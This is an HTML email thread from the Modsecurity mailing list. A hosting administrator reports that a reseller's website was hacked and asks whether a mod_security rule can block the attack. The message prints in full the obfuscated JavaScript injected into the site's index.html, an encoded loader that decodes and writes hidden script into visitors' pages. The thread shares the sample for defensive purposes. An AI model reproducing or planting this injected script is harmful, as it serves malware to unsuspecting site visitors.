<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
I don't know, but I seem to have noticed a big increase in the number
of attempts to hack my website lately as well. I don't know if any of
it is related to what happened to your client though.<br>
<br>
Drek<br>
<br>
<a class="moz-txt-link-abbreviated" href="mailto:admin@efastservers.com">admin@efastservers.com</a> wrote:
<blockquote cite="mid:md5:FFFFFF87FFFFFF8B2FFFFFFF8BFFFFFFECFFFFFFCF65"
type="cite">
<meta http-equiv="Content-Type" content="text/html; ">
<meta name="Generator" content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:Arial;
color:windowtext;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
{page:Section1;}
-->
</style>
<div class="Section1">
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">One of my resellers
contacted me today stating that one of
his websites was hacked and possibly the server. He wanted to know what
we were
going to do about it.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">I checked the server but
no other website is affected except
for two of his own websites.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">There seems to be some
type of javascript file injection
vuln going around. I searched the logs but could not find anything
obvious in
his logs. I checked all sites and they are clean.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Here is what was injected
into his index.html file after the
<header> tag.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"></html>
<!--[z0s]--><script>do<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">cument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">%27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc%28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">%27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">%27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">%29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]--><o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">There is a small
discussion about this at <a moz-do-not-send="true"
href="http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23">http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23</a><o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Is there a mod_sec rule
that can stop this?<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Thanks<o:p></o:p></span></font></p>
</div>
<pre wrap="">
<hr size="4" width="90%">
_______________________________________________
Modsecurity mailing list
<a class="moz-txt-link-abbreviated" href="mailto:Modsecurity@gotroot.com">Modsecurity@gotroot.com</a>
<a class="moz-txt-link-freetext" href="http://lists.gotroot.com/mailman/listinfo/modsecurity">http://lists.gotroot.com/mailman/listinfo/modsecurity</a>
</pre>
</blockquote>
<br>
</body>
</html>